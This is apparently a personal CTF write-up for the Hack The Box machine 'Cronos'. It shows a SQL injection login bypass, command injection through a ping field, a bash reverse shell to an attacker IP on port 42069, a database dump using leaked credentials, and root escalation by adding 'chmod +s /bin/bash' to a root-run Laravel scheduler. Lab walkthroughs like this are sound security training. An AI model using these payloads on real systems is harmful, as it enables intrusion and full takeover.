# Cronos
> # 10.10.10.13

nmap
>PORT   STATE SERVICE VERSION
[22/tcp](portscan.md#22) open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
[53/tcp](portscan.md#53) open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
[80/tcp](portscan.md#80) open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works

The port 80 is hosting is the Ubuntu Apache2 default webpage
![[cronos1.png]]
Web enumeration gives no result, let's check out the port 53 which serve as DNS. 
Nothing interesting but something we can try is to check for some vhost, the first one to try out is always the more obvious, in this case:
>cronos.htb

Guess what
![[cronos2.png]]
All the links point to Laravel website or github folder, something suggest me that this is their framework.

After a while nothing came out.
Taking a step back and giving another shot to the DNS and trying different vhost for our new hostname [cronos.htb] with gobuster
```bash
gobuster vhost -u 'http://'cronos.htb -w /opt/wordlists/DNS/subdomains-top1million-5000.txt --append-domain -o vhost.scan
```

A new domain came to light:
>admin.cronos.htb
![[cronos3.png]]

Add it to the host table and let's see what's going on.
![[cronos4.png]]
An admin panel login, but we don't have any credential.

Web enumeration give us couple of php pages but all of them send us back to the login form.
sqlmap suggest to use the username parameter as vector for our injection
![[cronos5.png]]
Using  the comment after the username we can avoid the password checking and log in only with the user.
```
admin';#
```

Now we get redirected to the /welcome.php page which is a web interface for some os-command execution:
![[cronos6.png]]
And how we've supposed we can execute bash command:
![[cronos7.png]]
And leak a username:
```txt
noulis:x:1000:1000:Noulis Panoulis,,,:/home/noulis:/bin/bash
```
using this info we can easily cat the user flag:
```bash
8.8.8.8; cat /home/noulis/user.txt
```

running a shell from there with the command:
```bash
8.8.8.8; bash -i >& /dev/tcp/10.10.14.8/42069 0>&1
```
will give no result and i don't know why but putting the shell into a file
```bash
8.8.8.8; echo "bash -i >& /dev/tcp/10.10.14.8/42069 0>&1" > shell.sh
```
and executing it can apparently bypass this problem:
```bash
8.8.8.8; /bin/bash shell.sh
```
![[cronos8.png]]

>landing directory: /var/www/admin

In our landing folder there's a config file and this is his content:
```txt
   define('DB_SERVER', 'localhost');
   define('DB_USERNAME', 'admin');
   define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');
   define('DB_DATABASE', 'admin');
   $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
```
Connecting to the mysql cli 
```bash
mysql -u admin admin -pkEjdbRigfBHUREiNSDs
```
is a bit useless due to the fact that we cannot see the output of a command unless we close the cli
![[cronos9.png]]
the fastest way for checking out his content is to dump the database:
```bash
mysqldump -u admin -pkEjdbRigfBHUREiNSDs admin > dump.sql
```
And download it using your browser and the link 
> http://admin.cronos.htb/dump.sql

The only row is:
```txt
INSERT INTO `users` VALUES (1,'admin','4f5fffa7b2340178a716e3832451e058');
```
we have an hash, let's try to crack it with john the ripper
Nothing.

Moving on with linpeas and linenum a cronjob sticks out (even for the machine name CRONos) and it's root scheduled.
![[cronos10.png]]
```txt
* * * * *	root	php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
```
The cronjob run every minute a function from the artisan file called "schedule".

The artisan file content is the following:
```php
#!/usr/bin/env php
<?php
require __DIR__.'/bootstrap/autoload.php';
$app = require_once __DIR__.'/bootstrap/app.php';

$kernel = $app->make(Illuminate\Contracts\Console\Kernel::class);
$status = $kernel->handle(
    $input = new Symfony\Component\Console\Input\ArgvInput,
    new Symfony\Component\Console\Output\ConsoleOutput
);

$kernel->terminate($input, $status);
exit($status);
```

[Laravel website](https://laravel.com/docs/8.x/scheduling) suggest us what to modify in order to execute scheduled task with Laravel:


![[cronos12.png]]
Modifying the content of
(/var/www/laravel cause it's our app folder, where the artisan file is)
>/var/www/laravel/app/Console/Kernel.php

from 
```php
    protected function schedule(Schedule $schedule)
    {
        // $schedule->command('inspire')
        //          ->hourly();
 }
```
To
```php
    protected function schedule(Schedule $schedule)
    {
        // $schedule->command('inspire')
        //          ->hourly();
	$schedule->exec('chmod +s /bin/bash')->everyMinute();   
 }
```

We should be able to set the SUID bit as root to the bash binary.
After one minute the cronjob has been executed and we can open a root shell with
```bash
/bin/bash -p
```
![[cronos11.png]]


#machine #sqlinjection #mysql #laravel